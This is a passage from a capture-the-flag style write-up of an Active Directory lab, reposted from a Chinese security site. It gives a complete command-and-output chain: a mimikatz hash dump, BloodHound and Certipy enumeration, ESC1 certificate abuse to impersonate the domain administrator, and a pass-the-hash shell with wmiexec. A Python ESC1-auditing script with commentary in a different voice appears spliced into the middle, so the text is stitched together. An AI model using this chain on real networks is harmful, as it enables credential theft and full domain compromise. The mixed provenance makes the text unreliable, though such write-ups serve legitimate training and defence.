         * Domain   : CYBERSTRIKELAB
         * Password : (null)
        kerberos :
         * Username : cyberweb$
         * Domain   : CYBERSTRIKELAB.COM
         * Password : (null)
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!
```

This yields the NTLM hash of a domain user, cslab:

cslab : 39b0e84f13872f51efb3b8ba5018c517

DC - 10.6.6.55

BloodHound

```
❯ netexec ldap 10.6.6.55 -u cslab -H 39b0e84f13872f51efb3b8ba5018c517   --bloodhound -c All  --dns-server 10.6.6.55  --dns-tcp
SMB         10.6.6.55       445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
LDAP        10.6.6.55       389    DC               [+] cyberstrikelab.com\cslab:39b0e84f13872f51efb3b8ba5018c517
LDAP        10.6.6.55       389    DC               Resolved collection methods: container, localadmin, acl, group, psremote, objectprops, dcom, rdp, trusts, session
[19:52:14] ERROR    Unhandled exception in computer DC.cyberstrikelab.com processing: The NETBIOS connection with the remote host timed out.                      computers.py:270
LDAP        10.6.6.55       389    DC               Done in 0058S
LDAP        10.6.6.55       389    DC               Compressing output into /Users/a/.nxc/logs/DC_10.6.6.55_2025-05-22_195130_bloodhound.zip
```

Nothing of note in the BloodHound data.

Certipy

The earlier fscan run showed that AD CS is present in the domain, so enumerate it with Certipy:

```
❯ certipy find -vuln  -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517  -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.6.6.55:636 - ssl
[+] Default path: DC=cyberstrikelab,DC=com
[+] Configuration path: CN=Configuration,DC=cyberstrikelab,DC=com
[+] Adding Domain Computers to list of current user's SIDs
[+] List of current user's SIDs:
     CYBERSTRIKELAB.COM\Domain Computers (S-1-5-21-4286488488-1212600890-1604239976-515)
     CYBERSTRIKELAB.COM\Everyone (CYBERSTRIKELAB.COM-S-1-1-0)
     CYBERSTRIKELAB.COM\Users (CYBERSTRIKELAB.COM-S-1-5-32-545)
     CYBERSTRIKELAB.COM\Authenticated Users (CYBERSTRIKELAB.COM-S-1-5-11)
     CYBERSTRIKELAB.COM\Domain Users (S-1-5-21-4286488488-1212600890-1604239976-513)
     CYBERSTRIKELAB.COM\cslab (S-1-5-21-4286488488-1212600890-1604239976-1104)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'DC.cyberstrikelab.com' at '10.6.6.55'
[*] Trying to get CA configuration for 'cyberstrikelab-DC-CA' via CSRA
[+] Trying to get DCOM connection for 10.6.6.55
[!] Got error while trying to get CA configuration for 'cyberstrikelab-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'cyberstrikelab-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'DC.cyberstrikelab.com' (10.6.6.55)
[*] Got CA configuration for 'cyberstrikelab-DC-CA'
[+] Resolved 'DC.cyberstrikelab.com' from cache: 10.6.6.55
[+] Connecting to 10.6.6.55:80
[*] Saved BloodHound data to '20250522202934_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250522202934_Certipy.txt'
[*] Saved JSON output to '20250522202934_Certipy.json'
```

ESC1

❯ cat 20250522202934_Certipy.txt
Certificate Authorities
  0
    CA Name                             : cyberstrikelab-DC-CA
    DNS Name                            : DC.cyberstrikelab.com
    Certificate Subject                 : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com
    Certificate Serial Number           : 652A47597C7F03824B7815EBE474E40B
    Certificate Validity Start          : 2025-04-22 07:45:38+00:00
    Certificate Validity End            : 2030-04-22 07:55:38+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CYBERSTRIKELAB.COM\Administrators
      Access Rights
        ManageCertificates              : CYBERSTRIKELAB.COM\Administrators
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
        ManageCa                        : CYBERSTRIKELAB.COM\Administrators
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
        Enroll                          : CYBERSTRIKELAB.COM\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
  0
    Template Name                       : DC
    Display Name                        : DC
    Certificate Authorities             : cyberstrikelab-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CYBERSTRIKELAB.COM\Domain Users
                                          CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Domain Computers
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Authenticated Users
      Object Control Permissions
        Owner                           : CYBERSTRIKELAB.COM\Administrator
        Write Owner Principals          : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Administrator
        Write Dacl Principals           : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Administrator
        Write Property Principals       : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Enterprise Admins
                                          CYBERSTRIKELAB.COM\Administrator
    [!] Vulnerabilities
      ESC1                              : 'CYBERSTRIKELAB.COM\Domain Users', 'CYBERSTRIKELAB.COM\Domain Computers' and 'CYBERSTRIKELAB.COM\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
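The ESC1 verdict in the report above follows from a handful of template fields, and removing any one of them (manager approval, a required signature, or low-privileged enrollment rights) clears the finding. The following is an added auditing example, not Certipy's own code: it re-derives that verdict from a constructed sample in Certipy's text layout, so the same check can be run over a report of your own; the LOW_PRIV group list is an assumption for this example.

```python
import re

# Groups every domain member belongs to: if any of them can enroll, the template is
# reachable from a low-privileged account (list constructed for this example).
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
LIST_FIELDS = {"Enrollment Rights"}  # fields whose value continues on indented lines
FIELD_RE = re.compile(r"^(\s*)([A-Za-z][A-Za-z0-9 ]*?)\s*:\s*(.*?)\s*$")

def parse_templates(text):
    """Split the 'Certificate Templates' section of a Certipy text report into dicts."""
    templates = []
    for chunk in re.split(r"^[ \t]*\d+[ \t]*$", text.partition("Certificate Templates")[2], flags=re.M)[1:]:
        fields, last, indent = {}, None, 0
        for line in chunk.splitlines():
            m = FIELD_RE.match(line)
            if m:
                indent, key, value = len(m.group(1)), m.group(2), m.group(3)
                fields[key] = [value] if key in LIST_FIELDS else value
                last = key if key in LIST_FIELDS else None
            elif last and line.strip() and len(line) - len(line.lstrip()) > indent:
                fields[last].append(line.strip())  # continuation line of a list field
            else:
                last = None  # a header such as 'Object Control Permissions' ends the list
        templates.append(fields)
    return templates

def is_esc1(t):
    """Certipy's ESC1 rule over the parsed fields; any one False here clears the finding."""
    enrollers = {p.split("\\", 1)[-1] for p in t.get("Enrollment Rights", [])}
    return (t.get("Enabled") == "True"
            and t.get("Enrollee Supplies Subject") == "True"
            and (t.get("Client Authentication") == "True" or t.get("Any Purpose") == "True")
            and t.get("Requires Manager Approval") == "False"
            and t.get("Authorized Signatures Required", "0") == "0"
            and bool(enrollers & LOW_PRIV))

# Constructed sample in Certipy's text layout, mirroring the page's DC template.
SAMPLE = r"""Certificate Templates
  0
    Template Name                       : DC
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
        Enrollment Rights               : CYBERSTRIKELAB.COM\Domain Admins
                                          CYBERSTRIKELAB.COM\Authenticated Users
      Object Control Permissions
        Owner                           : CYBERSTRIKELAB.COM\Administrator
"""
```

Flipping "Requires Manager Approval" to True, or replacing "Authenticated Users" with a privileged group, makes is_esc1 return False for the same template, which is the mitigation a defender would apply to a template like DC.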

ESC1, just go all in - -

❯ certipy req -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517 -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -template DC -ca cyberstrikelab-DC-CA -debug -upn administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.6.6.55[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.6.6.55[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

❯ certipy auth -pfx administrator.pfx -domain cyberstrike.com -dc-ip 10.6.6.55 -ns 10.6.6.55 -debug -username administrator -domain CYBERSTRIKELAB.COM
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@cyberstrikelab.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa

flag3

❯ wmiexec.py cyberstrike.com/administrator@10.6.6.55 -hashes :28cfbc91020438f2a064a63fff9871fa
/opt/homebrew/bin/wmiexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.11.0', 'wmiexec.py')
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type c:/flag.txt
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
�����﷨����ȷ��
C:\>dir c:/
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
��Ч���� - ""��
C:\>dir c:\
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
 ������ C �еľ�û�б�ǩ��
 �������к��� 2C36-C1B6

 c:\ ��Ŀ¼

2025/04/22  16:37                45 flag.txt
2025/04/22  15:53    <DIR>          inetpub
2025/04/22  15:43    <DIR>          PerfLogs
2018/02/03  03:38    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2025/04/22  15:54    <DIR>          Users
2025/05/22  20:39    <DIR>          Windows
               1 ���ļ�             45 �ֽ�
               6 ��Ŀ¼ 26,064,306,176 �����ֽ�
C:\>type c:\flag.txt
go-flag{1DDE7826-F56B-486D-A661-E9AA83874EFA}
C:\>

Originally published on the WeChat official account 红队蓝军: cslab-lab9内网渗透

When reposting, please keep the link to this article (CN-SEC中文网, with thanks to the original author): cslab-lab9内网渗透 https://cn-sec.com/archives/4100491.html